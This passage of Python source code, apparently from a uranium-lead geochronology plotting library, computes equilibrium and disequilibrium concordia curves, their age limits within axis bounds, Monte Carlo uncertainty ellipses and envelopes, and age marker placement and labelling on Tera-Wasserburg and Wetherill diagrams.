eq_xy(t_xmax, diagram)[1] < ax_ymax:\n t_min = t_xmax\n # check if curve intersects ymin b/w xlim\n else:\n r = optimize.brentq(lambda t: eq_xy(t, diagram)[1] - ax_ymin,\n 4.6e3, 1e-3, full_output=True, disp=False)\n if r[1].converged:\n t_min = r[0]\n else:\n return -1, [t_min, t_max]\n\n # get max t value\n if ax_ymin < eq_xy(t_xmin, diagram)[1] < ax_ymax:\n t_max = t_xmin\n else:\n r = optimize.brentq(lambda t: eq_xy(t, diagram)[1] - ax_ymax,\n 4.6e3, 1e-3, full_output=True, disp=False)\n if r[1].converged:\n t_max = r[0]\n else:\n return -1, [t_min, t_max]\n\n elif diagram == 'wc':\n\n t_ymax = 1. / cfg.lam238 * np.log(ax_ymax + 1.)\n t_ymin = 1. / cfg.lam238 * np.log(ax_ymin + 1.)\n\n # check bottom left corner of axes is not above / left of concordia curve\n if eq_xy(t_ymin, diagram)[0] > ax_xmax:\n return 1, [t_min, t_max]\n # check top left corner of axes is not below / left of concordia curve\n if eq_xy(t_ymax, diagram)[0] < ax_xmin:\n return 1, [t_min, t_max]\n\n # get min t value\n # check curve goes through ax_ymin b/w xlim\n if ax_xmin < eq_xy(t_ymin, diagram)[0] < ax_xmax:\n t_min = t_ymin\n # check if curve intersects ymin b/w xlim\n else:\n r = optimize.brentq(lambda t: eq_xy(t, diagram)[0] - ax_xmin,\n 4.6e3, 1e-3, full_output=True, disp=False)\n if r[1].converged:\n t_min = r[0]\n else:\n return -1, [t_min, t_max]\n\n # get max t value\n if ax_xmin < eq_xy(t_ymax, diagram)[1] < ax_xmax:\n t_max = t_ymax\n else:\n r = optimize.brentq(lambda t: eq_xy(t, diagram)[0] - ax_xmax,\n 4.6e3, 1e-3, full_output=True, disp=False)\n if r[1].converged:\n t_max = r[0]\n else:\n return -1, [t_min, t_max]\n\n return 0, [t_min, t_max]\n\n\n#==============================================================\n# Diseq concordia functions\n#==============================================================\n\ndef diseq_xy(t, A, meas, diagram):\n \"\"\"Return x, y for given t along disequilibrium concordia curve.\n \"\"\"\n assert diagram in ('tw', 'wc')\n if diagram == 'tw':\n x = 1. / ludwig.f(t, A[:-1], meas=meas)\n y = ludwig.g(t, A[-1]) * x / cfg.U\n elif diagram == 'wc':\n y = ludwig.f(t, A[:-1], meas=meas)\n x = ludwig.g(t, A[-1])\n return x, y\n\n\ndef diseq_dxdt(t, A, meas, diagram):\n \"\"\"\n Return x given t along disequilibrium concordia curve.\n Used e.g. to compute dx/dt\n \"\"\"\n assert diagram == 'tw'\n def conc_x(t):\n x, _ = diseq_xy(t, A, meas, diagram)\n return x\n h = abs(t) * np.sqrt(np.finfo(float).eps)\n dxdt = misc.cdiff(t, conc_x, h)\n return dxdt\n\n\ndef diseq_slope(t, A, meas, diagram):\n \"\"\"\n Compute tangent to concordia at given t. I.e. dy/dx for given t.\n \"\"\"\n h = np.sqrt(np.finfo(float).eps) * t\n x2, y2 = diseq_xy(t + h, A, meas, diagram)\n x1, y1 = diseq_xy(t - h, A, meas, diagram)\n return (y2 - y1) / (x2 - x1)\n\n\ndef diseq_age_ellipse(t, A, sA, meas, trials=1_000, pA=None, diagram='tw'):\n \"\"\"\n Plot disequilibrium concordia marker as an \"age ellipse\" which provides\n a visual representation of uncertainty in x-y for given t value arising from\n uncertainties in activity ratio values.\n \"\"\"\n assert diagram == 'tw', 'can only plot ellipses for Tera-Wasserburg diagram ' \\\n 'at present'\n\n # do monte carlo simulation\n #TODO: should take in activity ratios?\n if pA is None:\n pA = cfg.rng.normal(A, sA, (trials, 4))\n else:\n assert pA.shape[1] == 4\n\n flags = np.zeros(trials)\n\n if meas[0]:\n a234_238_i = useries.aratio48i(t, pA[:, 0])\n flags = np.where(a234_238_i < 0, -1, 0)\n if meas[1]:\n a230_238_i = useries.aratio08i(t, pA[:, 0], pA[:, 1], init= not meas[0])\n flags = np.where((a230_238_i < 0) & (flags == 0), -2, 0)\n\n if sum(flags != 0) > (0.99 * trials):\n msg = f'{sum(flags != 0)}/{trials} negative activity ratio soln. ' \\\n f'values in age ellipse t = {t:.3f} Ma'\n warnings.warn(msg)\n\n x, y = diseq_xy(t, A, meas, 'tw') # centre point\n xpts, ypts = diseq_xy(t, np.transpose(pA), meas, 'tw')\n\n V_xy = np.cov(np.array([xpts, ypts]))\n sx, sy = np.sqrt(np.diag(V_xy))\n r_xy = V_xy[0, 1] / (sx * sy)\n\n if np.isclose(abs(r_xy), 1.0):\n #TODO: review this\n r_xy = (1. - 1e-08) * np.sign(r_xy)\n\n # reset r_xy for special cases:\n if sA[-1] == 0:\n if any(np.asarray(sA[:2]) != 0):\n r_xy = 1. - 1e-08\n else:\n if all((x == 0 for x in sA[:2])):\n sx = 0.\n r_xy = 0.\n\n return x, y, sx, sy, r_xy\n\n\ndef diseq_equi_points(t1, t2, xlim, ylim, A, meas, diagram, ngp=500_000, n=500):\n \"\"\"\n Return ages that give equally spaced x, y points along disequilbrium\n concordia between upper and lower age limits.\n \"\"\"\n # TODO: this needs further debugging, sometimes returns t of length n + 1,\n # also occasionally returns duplicate t values.\n assert t2 > t1\n t = np.linspace(t1, t2, ngp)\n # suppress numpy warnings\n with np.errstate(all='ignore'):\n dr = diseq_velocity(t, xlim, ylim, A, meas, diagram)\n # Cumulative integrated area under eq_velocity curve (aka cumulative\n # \"distance\") at each t_j from t1 to t2:\n cum_r = integrate.cumtrapz(dr, t, initial=0)\n # Divide cumulative area under eq_velocity curve into equal portions.\n rj = np.arange(n + 1) * cum_r[-1] / n\n # Find t_j value at each r_j:\n idx = np.searchsorted(cum_r, rj, side=\"left\")\n idx[-1] = ngp - 1 if idx[-1] >= ngp else idx[-1]\n t = t[idx]\n x, y = diseq_xy(t, A, meas, diagram)\n return t, x, y\n\n\ndef diseq_velocity(t, xlim, ylim, A, meas, diagram):\n \"\"\"\n Estimate dr/dt, which is \"eq_velocity\" along a diseq concordia curve in\n x-y space. Uses axis coordinates to circumvent scaling issues.\n \"\"\"\n h = 1e-08 * t\n xspan = xlim[1] - xlim[0]\n yspan = ylim[1] - ylim[0]\n x2, y2 = diseq_xy(t + h, A, meas, diagram)\n x1, y1 = diseq_xy(t - h, A, meas, diagram)\n v = np.sqrt(((x2 - x1) / xspan) ** 2 + ((y2 - y1) / yspan) ** 2) / (2. * h)\n return v\n\n\n#=================================\n# Concordia age bound functions\n#=================================\n\ndef diseq_age_limits(ax, A, meas, diagram='tw', tbounds=(0.010, 100.),\n max_age=10.):\n \"\"\"\n Find the age limits of a disequilibrium concordia curve segment\n that plots within the given axis limits.\n\n Uses a brute force method to find approximate limits, then refines these\n using Newton's method.\n\n \"\"\"\n assert diagram == 'tw', 'Wetheril concordia not yet implemented'\n\n ax_xmin, ax_xmax = ax.get_xlim()\n ax_ymin, ax_ymax = ax.get_ylim()\n tbounds = np.asarray(tbounds, dtype='double')\n tlim = list(tbounds)\n\n # --- testing ----\n # tt = np.logspace(np.log(1e-3), np.log(1e3), num=1_000_000, base=np.exp(1))\n # xx, yy = concordia.diseq_xy(tt, A, ~np.asarray(meas), diagram)\n # ax.plot(xx, yy, 'ro')\n # ax.get_figure().show()\n # -----------\n\n t_min, t_max = None, None\n\n # Check if tlim[1] exceeds t_max\n if max_age is not None:\n if max_age < tlim[0]:\n raise ValueError('max_age cannot be less than the first element of tlim')\n if tlim[1] > max_age:\n tlim[1] = max_age\n\n # Check if hard limits are inside plot window.\n xc, yc = diseq_xy(np.asarray(tlim), A, meas, diagram)\n if all((xc > ax_xmin) & (xc < ax_xmax) & (yc > ax_ymin) & (yc < ax_ymax)):\n return 0, tlim, tbounds\n\n # Simulate log-spaced points and check if any are inside axis bounds.\n tc = np.logspace(np.log10(tlim[0]), np.log10(tlim[1]), num=1_000_000)\n xc, yc = diseq_xy(tc, A, meas, diagram)\n inside = ((ax_xmin < xc) & (xc < ax_xmax)) & ((ax_ymin < yc) & (yc < ax_ymax))\n\n # Verify that a point has been found, if not return error code.\n if np.sum(inside) < 1:\n return 1, (t_min, t_max), tbounds\n elif np.sum(inside) > 3 and any(meas):\n # If measured 234/238 or 230/238 given, do not allow concordia curve to\n # loop back over itself. This creates plotting difficulties. Also, the loooping\n # part is usually (always?) associated with physically implausible initial activity\n # ratio solutions.\n\n # check if dx/dt changes sign, if so, there are multiple y for x, and\n # therefore t needs to be truncated to plot envelope\n dxdt = diseq_dxdt(tc[inside], A, meas, diagram)\n ind = np.where(np.diff(np.sign(dxdt)) != 0)[0]\n if ind.shape[0] != 0:\n if len(ind) > 1: # if multiple dx/dt changes, probably a numerical issue computing deriv.\n warnings.warn(f'multiple dx/dt sign changes in concordia found')\n else:\n tlim[1] = float(tc[inside][ind])\n tbounds[1] = tlim[1]\n warnings.warn(f'concordia truncated at t = {tlim[1]:.3f} because dx/dt changes sign')\n # re-do search for inside points\n tc = np.logspace(np.log10(tlim[0]), np.log10(tlim[1]), num=1_000_000)\n xc, yc = diseq_xy(tc, A, meas, diagram)\n inside = ((ax_xmin < xc) & (xc < ax_xmax)) & ((ax_ymin < yc) & (yc < ax_ymax))\n\n # Get indices of inside / outside change points for different cases:\n min_inside, max_inside = False, False\n idx = np.where(np.diff(inside) != 0)[0]\n cp = len(idx)\n if cp == 0:\n return 1, [t_min, t_max], tbounds\n elif cp == 1:\n # Either tlim[0] or tlim[1] is inside axis bounds.\n if inside[0]:\n min_inside = True\n t_min = tlim[0]\n t_max = (tc[idx[0]], tc[idx[0] + 1])\n else:\n max_inside = True\n t_min = (tc[idx[0]], tc[idx[0] + 1])\n t_max = tlim[1]\n elif cp == 2:\n if inside[0]:\n # must be more than one segment - only use first!\n t_min = tlim[0]\n t_max = (tc[idx[0]], tc[idx[0] + 1])\n tlim[1] = tc[idx[0] + 1]\n else:\n # Neither tlim[0] nor tlim[1] are in axis bounds.\n t_min = (tc[idx[0]], tc[idx[0] + 1])\n t_max = (tc[idx[1]], tc[idx[1] + 1])\n elif cp == 3 and inside[0]:\n # must be more than one segment - only use first!\n t_min = tlim[0]\n t_max = (tc[idx[0]], tc[idx[0] + 1])\n tlim[1] = tc[idx[0] + 1]\n elif cp in (3, 4):\n # Neither tlim[0] nor tlim[1] are in axis bounds.\n t_min = (tc[idx[0]], tc[idx[0] + 1])\n t_max = (tc[idx[1]], tc[idx[1] + 1])\n tlim[1] = tc[idx[1] + 1]\n\n elif cp > 4:\n raise RuntimeError('cannot have more than four boundary points')\n\n if not min_inside:\n try:\n t_min = refine_age_lim(ax.get_xlim(), ax.get_ylim(), *t_min, A,\n meas, which='lower')\n except ConvergenceError:\n warnings.warn('lower concordia age limit could not be refined')\n t_min = np.min(t_min)\n if not max_inside:\n try:\n t_max = refine_age_lim(ax.get_xlim(), ax.get_ylim(), *t_max, A,\n meas, which='upper')\n except ConvergenceError:\n warnings.warn('upper concordia age limit could not be refined')\n t_max = np.min(t_max)\n\n assert t_max > t_min, 'lower concordia age limit should be smaller than ' \\\n 'upper limit'\n\n return 0, [t_min, t_max], tbounds\n\n\ndef refine_age_lim(xlim, ylim, t1, t2, A, meas, which='lower'):\n \"\"\"\n Refine limits using newton\n \"\"\"\n xmin, xmax = xlim\n ymin, ymax = ylim\n\n # refine lower\n x1, y1 = diseq_xy(t1, A, meas, 'tw')\n x2, y2 = diseq_xy(t2, A, meas, 'tw')\n t0 = np.mean((t1, t2))\n\n # Lower t limit. t2 inside axis bounds, t1 is outside.\n if x1 > x2:\n # check intersection with xmin\n if which == 'lower':\n fmin, dfmin = min_tax(xmax, meas, diagram='tw')\n else:\n fmin, dfmin = min_tax(xmin, meas, diagram='tw')\n with np.errstate(all='ignore'):\n r = optimize.newton(fmin, t0, dfmin, full_output=True, disp=False,\n args=([A]))\n if r[1].converged:\n if ymin < diseq_xy(r[0], A, meas, 'tw')[1] < ymax:\n return r[0]\n\n if ((y2 > y1) and not (ymin < y1 < ymax)) or ((y2 < y1) and (ymin < y1 < ymax)):\n # check intersection with ymin\n fmin, dfmin = min_tay(ymin, meas, diagram='tw')\n with np.errstate(all='ignore'):\n r = optimize.newton(fmin, t0, dfmin, full_output=True, disp=False,\n args=([A]))\n if r[1].converged:\n if xmin < diseq_xy(r[0], A, meas, 'tw')[0] < xmax:\n return r[0]\n else:\n # check intersection with ymax\n fmin, dfmin = min_tay(ymax, meas, diagram='tw')\n with np.errstate(all='ignore'):\n r = optimize.newton(fmin, t0, dfmin, full_output=True, disp=False,\n args=([A]))\n if r[1].converged:\n if xmin < diseq_xy(r[0], A, meas, 'tw')[0] < xmax:\n return r[0]\n\n raise ConvergenceError('could not refine concordia age limits')\n\n\ndef min_tay(y, meas, diagram='tw'):\n \"\"\"\n Minimisation function to solve concordia age for given y value.\n \"\"\"\n def fmin(t, A):\n return diseq_xy(t, A, meas, diagram)[1] - y\n def dfmin(t, A):\n #TODO: replace with analytical derivative\n return misc.cdiff(t, fmin, 1e-08 * t, A)\n return fmin, dfmin\n\n\ndef min_tax(x, meas, diagram='tw'):\n \"\"\"\n Minimisation function to solve concordia age for given x value.\n \"\"\"\n def fmin(t, A):\n return diseq_xy(t, A, meas, diagram)[0] - x\n def dfmin(t, A):\n #TODO: replace with analytical derivative\n return misc.cdiff(t, fmin, 1e-08 * t, A)\n return fmin, dfmin\n\n\n#====================\n# Concordia markers\n#====================\n\ndef generate_age_markers(ax, t1, t2, tbounds, diagram, eq=True,\n point_markers=True, ell=False, A=None, sA=None, meas=None,\n marker_ages=(), age_prefix='Ma', auto=True):\n \"\"\"\n Generate appropriately spaced concordia age markers and label text.\n\n Parameters\n ----------\n t1 : float\n lower concordia age in plot,\n t2 : float\n upper concordia age\n ell : bool\n plot age ellipses\n\n \"\"\"\n assert point_markers or ell, 'one of point_markers or ell must be True'\n assert t2 > t1, 'upper age limit must be greater than lower age limit'\n age_unit = 1. if age_prefix == 'Ma' else 1e-3\n dt = None\n\n if not auto: # manual age markers\n\n if len(marker_ages) == 0:\n raise ValueError('ages cannot be empty if auto set to False')\n for i, x in enumerate(marker_ages):\n try:\n fx = float(x) * age_unit\n except ValueError:\n raise ValueError(f'could not convert marker age {x} to a'\n f'number')\n else:\n if not cfg.conc_age_bounds[0] < fx < cfg.conc_age_bounds[1]:\n msg = f'marker age {x} {age_prefix} outside ' \\\n f'conc_age_bounds value set in config'\n warnings.warn(msg)\n\n t_sorted = np.sort(np.array(marker_ages, dtype=np.double))\n t = t_sorted * age_unit\n t_sorted = t_sorted[(t1 < t_sorted) & (t_sorted < t2)]\n n_inside = len(t[np.logical_and(t1 < t, t2 > t)])\n # which markers to label:\n if n_inside > cfg.every_second_threshold:\n add_label = [True if i % 2 == 0 else False for i, t in enumerate(t)]\n else:\n add_label = [True for t in t]\n\n else: # find auto marker locations\n\n max_markers = 8 if ell else 12\n dt = age_marker_spacing(ax, t1, t2, diagram, A=A, meas=meas, eq=eq,\n max_markers=max_markers)\n\n # Get marker age points:\n t_start = misc.round_down(np.floor(t1 / dt) * dt, 5)\n t = np.arange(t_start, t2 + dt, dt)\n\n # Reset to 0 if sufficiently close in order to avoid labelling problems.\n t = [0. if abs(x) < 1e-9 else x for x in t]\n t = np.array([round(x, 10) for x in t]) # round ages to get around f.p. issues\n\n # If labelling every second, check which label to start with. Preference\n # starting on label with less significant digits, then preference starting\n # on label ending in 1, and finally preference starting on even number.\n n = len(t)\n\n start_idx = 0\n step = 1\n if n > cfg.every_second_threshold:\n step = 2\n t0 = misc.round_down(float(t[0]), 8)\n t1 = misc.round_down(float(t[1]), 8)\n s0 = str(t0).rstrip(\"0\") # first marker in sequence\n s1 = str(t1).rstrip(\"0\") # second marker in sequence\n\n if s0 == '':\n # if initial t is 0\n start_idx = 1\n elif s0[-1] == '.':\n start_idx = 0\n elif s1[-1] == '.':\n start_idx = 1\n elif len(s0) > len(s1):\n start_idx = 1\n elif float(s0[-1]) % 2 > 0 and float(s1[-1]) % 2 == 0:\n start_idx = 1\n\n # Add extra markers to ends, in case they are partly displayed in plot\n # window - but this should not affect label starting age.\n # if not ell:\n t = np.arange(t_start - dt, t2 + 2 * dt, dt)\n start_idx = 1 if start_idx == 0 else 0\n\n t = np.array([round(x, 10) for x in t]) # round ages again\n t = t[(t >= tbounds[0]) & (t <= tbounds[1])] # double check bounds\n num_t = len(t) # new number of markers\n\n # list of bools indicating which markers to add a label to:\n if n > cfg.every_second_threshold:\n add_label = [True if (i - start_idx) % step == 0\n else False for i in range(num_t)]\n else:\n add_label = [True] * len(t)\n\n markers_dict = {'diagram': diagram,\n 't': t,\n 'dt': dt,\n 'ell': ell,\n 'point_markers': point_markers,\n 'eq': eq,\n 'A': A,\n 'sA': sA,\n 'meas': meas,\n 'add_label': add_label,\n 'age_prefix': age_prefix}\n\n return markers_dict\n\n\ndef estimate_marker_spacing(tspan):\n \"\"\"\n Get initial estimate of appropriate concordia marker spacing.\n \"\"\"\n dt = 10 ** misc.get_exponent(tspan) / 8\n while abs(tspan / dt) > 12:\n dt *= 2\n return misc.round_down(dt, 8)\n\n\ndef age_marker_spacing(ax, t1, t2, diagram, A=None, meas=None, eq=True,\n max_markers=12):\n \"\"\"\n Estimate reasonable concordia age marker spacing given upper and lower\n age marker limits.\n\n \"\"\"\n tspan = t2 - t1\n t_ratio = t2 / t1\n # First estimate of spacing between markers, dt.\n dt = estimate_marker_spacing(tspan)\n if t_ratio > 5 and t2 > 1:\n dt = estimate_marker_spacing(tspan / 4)\n # Increase spacing if too many markers.\n while abs(tspan / dt) > max_markers:\n dt *= 2\n\n # Check dt after calculaing the fraction of x, y axis spanned by\n # concordia and refine if necessary...\n if eq:\n x_tmin, y_tmin = eq_xy(t1, diagram)\n x_tmax, y_tmax = eq_xy(t2, diagram)\n else:\n x_tmin, y_tmin = diseq_xy(t1, A, meas, diagram)\n x_tmax, y_tmax = diseq_xy(t2, A, meas, diagram)\n\n x_frac = abs((x_tmin - x_tmax) / (ax.get_xlim()[1] - ax.get_xlim()[0]))\n y_frac = abs((y_tmin - y_tmax) / (ax.get_ylim()[1] - ax.get_ylim()[0]))\n\n # Refine dt using some rules of thumb.\n k = 0.6\n for i in range(1, 5):\n k *= 0.5\n if x_frac < k and y_frac < k:\n dt *= 2\n\n return dt\n\n\ndef plot_age_markers(ax, markers_dict, p=0.95, pA=None):\n \"\"\"\n Add age markers and/or age ellipses to plot.\n\n Parameters\n ----------\n markers : dict\n age marker properties, typically returned from calling get_age_markers\n\n \"\"\"\n # unpack markers dict\n diagram = markers_dict['diagram']\n eq = markers_dict['eq']\n age_prefix = markers_dict['age_prefix']\n A = markers_dict['A']\n sA = markers_dict['sA']\n meas = markers_dict['meas']\n t = markers_dict['t']\n ell = markers_dict['ell']\n point_markers = markers_dict['point_markers']\n add_label = markers_dict['add_label']\n \n assert ell or point_markers, 'one of ell or point_markers must be True'\n n = len(t)\n\n # Plot markers / ellipses.\n if eq:\n x, y = eq_xy(t, diagram)\n else:\n x, y = diseq_xy(t, A, meas, diagram)\n\n if ell: # plot age markers as ellipses\n # pre-allocate arrays to store ellipse params for labelling\n ell_obj = []\n bbox = []\n sx = np.empty(n)\n sy = np.empty(n)\n r_xy = np.empty(n)\n\n for i, age in enumerate(t):\n if eq:\n sx[i], sy[i], r_xy[i] = eq_age_ellipse(age, diagram)\n else:\n _, _, sx[i], sy[i], r_xy[i] = diseq_age_ellipse(age, A, sA, meas, pA=pA)\n ellipse = plotting.confidence_ellipse(ax, x[i], sx[i], y[i], sy[i],\n r_xy[i], p=p, mpl_label=f'age ellipse, {t[i]:.6f} Ma',\n ellipse_kw=cfg.conc_age_ellipse_kw,\n outline_alpha=False)\n ell_obj.append(ellipse)\n if point_markers:\n ax.plot(x[i], y[i], label='concordia marker', **cfg.conc_markers_kw)\n\n else: # plot age markers only\n ax.plot(x, y, label='concordia marker', **cfg.conc_markers_kw)\n\n # Generate marker label text.\n age_unit = 1e-3 if age_prefix == 'ka' else 1.\n if sum(add_label) > 0:\n t_rounded = np.array([float(misc.round_down(age / age_unit, 8))\n for age in t])\n n_dec = np.max([misc.num_dec_places(x) for x in t_rounded[add_label]\n if add_label])\n\n if cfg.prefix_in_label:\n label_format = '{{:,.{}f}} {{}}'.format(n_dec)\n text = [label_format.format(x, age_prefix) for x in t_rounded]\n\n else:\n label_format = '{{:,.{}f}}'.format(n_dec)\n text = [label_format.format(x) for x in t_rounded]\n\n markers_dict['text'] = text\n\n markers_dict['x'] = x\n markers_dict['y'] = y\n markers_dict['add_label'] = add_label\n markers_dict['age_ellipses'] = ell\n\n if ell:\n markers_dict['bbox'] = bbox\n markers_dict['ell_obj'] = ell_obj\n \n return markers_dict\n\n\n#=====================\n# Concordia envelope\n#=====================\n\ndef plot_envelope(ax, diagram, xc=None, npts=100):\n \"\"\"\n Plot concordia uncertainty envelope which displays effect of decay constant\n errors.\n \"\"\"\n if xc is None:\n xc = np.linspace(*ax.get_xlim(), num=100, endpoint=True)\n t = eq_age_x(xc, diagram)\n x, y = eq_xy(t, diagram)\n dy = 1.96 * eq_envelope(xc, diagram)\n ax.fill_between(xc, y + dy, y - dy, label='concordia envelope',\n **cfg.conc_env_kw)\n ax.plot(xc, y - dy, **cfg.conc_env_line_kw, label='concordia envelope line')\n ax.plot(xc, y + dy, **cfg.conc_env_line_kw, label='concordia envelope line')\n\n\ndef plot_diseq_envelope(ax, ct, cx, cy, t0, t1, tbounds, A, sA, meas, diagram='tw',\n trials=10_000, spaghetti=False):\n \"\"\"\n Plot disequilibrium concordia envelope.\n \"\"\"\n assert diagram == 'tw', 'concordia diagram must be in Tera-Wasserburg form'\n\n nx = cx.shape[0]\n\n # simulate activity ratios\n # TODO: should allow simulated activity ratios to be passed in (?)\n pA = cfg.rng.normal(A, sA, (trials, 4))\n\n # ---- testing -----\n if spaghetti:\n for i in range(trials):\n t = np.linspace(t0, t1, trials)\n xy = diseq_xy(t, pA[i, :], meas, 'tw')\n ax.plot(*xy, lw=0.5)\n # ------------------\n\n # get envelope limits\n y_upper = np.zeros(nx)\n y_lower = np.zeros(nx)\n # TODO: use vectorised approach\n for i in range(nx):\n y_upper[i], y_lower[i] = mc_concordia_envelope(cx[i], ct[i], pA, meas,\n ax=ax)\n\n ok = ~np.isnan(y_lower) & ~np.isnan(y_upper)\n\n # plot envelope\n ax.plot(cx[ok], y_lower[ok], **cfg.conc_env_line_kw, label='concordia envelope line')\n ax.plot(cx[ok], y_upper[ok], **cfg.conc_env_line_kw, label='concordia envelope line')\n\n return pA\n\n\ndef mc_concordia_envelope(x, t0, pA, meas, ax=None):\n \"\"\"\n t is on the concordia curve\n \"\"\"\n trials = pA.shape[0]\n fmin, dfmin = min_tax(x, meas, diagram='tw')\n with np.errstate(all='ignore'):\n r = optimize.newton(fmin, np.full(trials, t0, dtype='double'), dfmin,\n full_output=True, disp=False, args=([np.transpose(pA)]))\n if np.sum(r.converged) < (0.95 * trials):\n warnings.warn(f'less than 95% of Monte Carlo envelope trials succesful at x = {x:.3f}')\n y_upper, y_lower = np.nan, np.nan\n else:\n conv = r.converged & ~np.isnan(r.root)\n t = r.root[conv]\n # assert np.allclose(x, 1. / ludwig.f(t, pA[:, :3][conv]), meas=meas)\n y = ludwig.g(t, pA[:, -1][conv]) * x / cfg.U\n y_lower, y_upper = np.quantile(y, (0.025, 0.975))\n return y_upper, y_lower\n\n\n#==============================================================================\n# Concordia labels\n#==============================================================================\n\ndef labels(ax, markers):\n \"\"\"\n Add labels to concordia age markers. Uses the same offset and rotation\n for each marker.\n\n Parameters\n ----------\n markers : dict\n age marker properties\n\n \"\"\"\n # Mask out values for markers that will not be labelled.\n add_label = np.array(markers['add_label'])\n x = np.array(markers['x'])[add_label]\n y = np.array(markers['y'])[add_label]\n txt = np.array(markers['text'])[add_label]\n n = sum(add_label)\n\n ann = []\n for i in range(n):\n an = ax.annotate(txt[i], (x[i], y[i]), **cfg.conc_text_kw,\n label='concorida label')\n ann.append(an)\n markers['label_annotations'] = ann\n return markers\n\n\ndef individualised_labels(ax, markers_dict, diagram, eq=True, A=None,\n meas=None, remove_overlaps=True):\n \"\"\"\n Plot concordia age labels using individualised position and rotation.\n\n Notes\n -----\n This routine doesn't currently work well for disequilibrium concordia curves\n that curve back around.\n \"\"\"\n assert diagram in ('tw', 'wc')\n fig = ax.get_figure()\n ell = markers_dict['age_ellipses']\n\n # Mask out values for markers_dict that will not be labelled.\n add_label = np.array(markers_dict['add_label'])\n if add_label.size == 0:\n warnings.warn('no labels to add within concordia age bounds')\n return\n x = np.array(markers_dict['x'])[add_label]\n y = np.array(markers_dict['y'])[add_label]\n t = np.array(markers_dict['t'])[add_label]\n txt = np.array(markers_dict['text'])[add_label]\n\n # Calculate some useful axes properties.\n xmin, xmax = ax.get_xlim()\n xspread = xmax - xmin\n ymin, ymax = ax.get_ylim()\n yspread = ymax - ymin\n\n # Get axis window extents in display points. Then calculate a \"scale factor\"\n # for converting slopes from data coordinates to display coordinates.\n ax_bbox = ax.get_window_extent()\n aspect_ratio = ax_bbox.height / ax_bbox.width\n scale_factor = yspread / xspread / aspect_ratio\n\n # Only pass in text properties to annotate(). We do not want to pass\n # in rotation or position properties for indidividualised labels.\n # TODO: consider if alignment properties could still be passed in?\n allowed_keys = ['alpha', 'backgroundcolor', 'color', 'c',\n 'fontfamily', 'family', 'fontsize', 'size',\n 'stretch', 'fontweight', 'weight', 'zorder',\n 'annotation_clip', 'clip_on']\n text_kw = {}\n for k, v in cfg.conc_text_kw.items():\n if k in allowed_keys:\n text_kw[k] = v\n\n # Create labels\n label_annotations = []\n\n n = sum(add_label)\n if ell:\n ell_obj = [b for (a, b) in zip(add_label, markers_dict['ell_obj']) if a]\n\n # Get annotation bbox properties for dummy annotation. Used to\n # calculate annotation box height (parallel to y-axis) in display\n # coordinates.\n an = ax.annotate(txt[0], (x[0], y[0]), va='center', ha='center',\n rotation=0, **text_kw)\n # fig.canvas.draw()\n anbbox = an.get_window_extent(renderer=fig.canvas.get_renderer())\n h = anbbox.height # display coordinates\n an.remove()\n\n # TODO: alignment kwargs could be added back in here?\n\n text_outline = None\n # ------- testing only ------\n # text_outline = dict(ec='red', lw=0.5, pad=0.0, fc='none')\n # ----------------------------------\n\n # add each marker\n for i in range(n):\n # Add annotation to figure at arbitraty location (on top of marker),\n # so we can get it's bounding box dimensions.\n an = ax.annotate(txt[i], (x[i], y[i]), va='center', ha='center',\n label='concordia label', rotation=0, bbox=text_outline,\n **text_kw)\n # anbbox = an.get_window_extent()\n # fig.canvas.draw()\n an_bbox = an.get_window_extent(renderer=fig.canvas.get_renderer())\n w = an_bbox.width\n x_disp, y_disp = ax.transData.transform((x[i], y[i]))\n\n # ---testing---\n # ax.plot(x[i], y[i], 'bo', ms=2, zorder=100)\n # ----\n\n # Get concordia slope (i.e. tangent) at t.\n if eq:\n slope = eq_slope(t[i], diagram)\n else:\n slope = diseq_slope(t[i], A, meas, diagram)\n\n # angle of concordia at marker location in display coords:\n # angle = np.arctan(slope / scale_factor) * 180 / np.pi\n angle = np.arctan2(slope, 1.)\n angle_disp = np.arctan2(slope / scale_factor, 1.)\n\n # ------ testing only - comment out -------\n #plot line parallel to concordia slope\n # b = slope\n # a = y[i] - b * x[i]\n # ax.plot((xmin, xmax), (a + b * xmin, a + b * xmax)), 'b--', lw=0.5, zorder=100)\n # ---------------------------\n\n # theta is the angle from positive x axis to offset the text box (for\n # normal markers, this will be orthoganol to the slope of the\n # concordia):\n orth_angle = angle + np.pi / 2.\n orth_angle_disp = angle_disp + np.pi / 2.\n\n # Find slope and intercept of a line running orthogonal (on scaled plot)\n # to the concordia curve at x, y:\n # b = np.tan(theta * np.pi / 180)\n orth_slope = np.tan(orth_angle) # true orthogonal line (data coords)\n b_disp = orth_slope * scale_factor # apparent orthogonol line (display coords)\n b = orth_slope * scale_factor ** 2 # apparent orthogonal line (data coords)\n\n # x,y in display coords\n # x_disp, y_disp = ax.transData.transform((x[i], y[i]))\n # a_disp = y_disp - b_disp * x_disp\n\n # ------ testing only - comment out-------\n # plot line orthogonal to slope\n # a = y[i] - b * x[i]\n # xx = np.linspace(*ax.get_xlim())\n # yy = a + b * xx\n # ax.plot(xx, yy, 'm--', lw=0.5, zorder=100)\n # ---------------------------\n\n if cfg.rotate_conc_labels:\n if cfg.perpendicular_rotation:\n if diagram == 'tw':\n an.set_rotation(orth_angle_disp * 180 / np.pi)\n elif diagram == 'wc':\n an.set_rotation(orth_angle_disp * 180 / np.pi)\n d = w / 2.\n\n else: # rotate parallel\n if diagram == 'tw':\n an.set_rotation(angle_disp * 180 / np.pi)\n elif diagram == 'wc':\n an.set_rotation(angle_disp * 180 / np.pi)\n d = h / 2.\n else:\n # Find intersection points of this orthogonal slope line and text\n # bbox: # need to call this again after rotation\n a_disp = y_disp - b_disp * x_disp\n ints = plotting.box_line_intersection(an_bbox.xmin, an_bbox.xmax,\n an_bbox.ymin, an_bbox.ymax, a_disp, b_disp)\n # offset text box by this extra amount (data coords)\n d = np.sqrt(np.sum((ints[1] - ints[0]) ** 2)) / 2.\n\n\n # Compute offsets\n f = cfg.offset_factor\n # d is the mimumum offset, f is extra user-defined offset (relative\n # label height and thus textsize)\n\n # dx_disp = (d + f * h) * -np.abs(np.cos(orth_angle_disp))\n # dy_disp = (d + f * h) * -np.sign(orth_slope) * np.sin(orth_angle_disp)\n dx_disp = -np.sqrt((d + f * h) ** 2 / (b_disp ** 2 + 1.))\n if diagram == 'tw' and b_disp < 0:\n dx_disp *= -1.\n dy_disp = b_disp * dx_disp\n\n # If age ellipses, add extra offset label along ellipse axis:\n if ell:\n # ---- testing -----\n # plot bbox around ellipse\n # ellbb = ax.transData.inverted().transform(ell_obj[i].get_extents())\n # rec = Rectangle((np.min(ellbb[:, 0]), np.min(ellbb[:, 1])),\n # ell_obj[i].width, 